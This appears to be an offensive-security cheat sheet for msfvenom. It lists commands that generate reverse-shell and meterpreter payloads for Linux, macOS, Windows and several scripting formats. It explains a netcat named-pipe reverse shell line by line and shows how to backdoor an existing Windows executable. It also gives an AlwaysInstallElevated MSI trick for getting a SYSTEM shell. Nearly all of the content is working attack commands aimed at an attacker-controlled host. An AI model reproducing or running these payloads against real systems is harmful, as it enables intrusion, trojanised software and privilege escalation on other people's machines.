msfvenom
msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts. For example:
# Use Metasploit to generate the code for a remote shell:
#
msfvenom -p cmd/unix/reverse_netcat \
lhost=$LOCAL_IP lport=$LOCAL_PORT
# Spin up a listener using netcat:
#
nc -lvp $LOCAL_PORT
This will generates code that looks like this:
mkfifo /tmp/qdsrgu; \
nc $LOCAL_IP $LOCAL_PORT 0</tmp/qdsrgu | \
/bin/sh >/tmp/qdsrgu 2>&1; \
rm /tmp/qdsrgu
What's going on here?
mkfifo /tmp/qdsrgucreates a named pipe at /tmp/qdsrgu.- We then spin up a netcat instance directed at our local machine (
nc $LOCAL_IP $LOCAL_PORT), direct the contents of the pipe into netcat's STDIN (0< /tmp/qdsrgu), pipe the output of netcat to a shell we know probably exists (| /bin/sh), and finally redirect both STDOUT and STDERR back into the named pipe (> /tmp/qdsrgu 2>&1). - On the local machine,
nc -lvp $LOCAL_PORTlistens for the incoming netcat connection from the remote. Anything we type on STDIN here gets sent to the remote and piped to /bin/sh there. The output of /bin/sh is then sent to the named pipe, which dumps into (the remote) netcat, which then sends the data to the local machine where it ends up on STDOUT.
Use --list formats to see available encoding formats. In general, shell scripts can always be produced by specifying -f raw and an output file with the appropriate extension.
Linux ELF executables
# 32-bit Linux ELF meterpreter payload
#
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f elf -o ${NAME}
macOS MACH-O executables
# 32-bit macOS MACH-O meterpreter payload
#
msfvenom -p osx/x86/shell_reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f macho -o ${NAME}
Windows executables
# 64-bit Windows executable meterpreter payload
#
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f exe -o ${NAME}.exe
# 64-bit Windows SERVICE executable (note that these require
# additional API calls to work, beyond what `-f exe` provides)
#
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f exe-service -o ${NAME}.exe
# Add a meterpreter backdoor to an existing executable
#
msfvenom -a x64 --platform windows -x $ORIGINAL_EXE -k \
-p windows/meterpreter/reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-b "\x00" -f exe -o $BACKDOORED_EXE
Note that by default msfvenom produces 64-bit executables when using the -f exe. This doesn't work, however, if you're trying to replace a program in Program Files (x86). In this case, you'll need to explicitly instruct msfvenom to encode a 32-bit binary using -e x86/shikata_ga_nai.
MSI installers
If AlwaysInstallElevated is set to 1 under both of the following registry keys, then MSI installers will run as SYSTEM.
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Generate a malicious MSI file with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f msi -o ${NAME}.msi
Then install on the target to get a shell:
msiexec /quiet /qn /i $INSTALLER.msi
HTML applications
VBA scripts
Bash scripts
msfvenom -p cmd/unix/reverse_bash \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f raw -o ${NAME}.sh
Python scripts
msfvenom -p cmd/unix/reverse_python \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f raw -o ${NAME}.py
Perl scripts
msfvenom -p cmd/unix/reverse_perl \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f raw -o ${NAME}.pl
PHP scripts
msfvenom -p php/meterpreter_reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f raw -o ${NAME}.php
ASP scripts
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f asp -o ${NAME}.asp
JSP scripts
msfvenom -p java/jsp_shell_reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f raw -o ${NAME}.jsp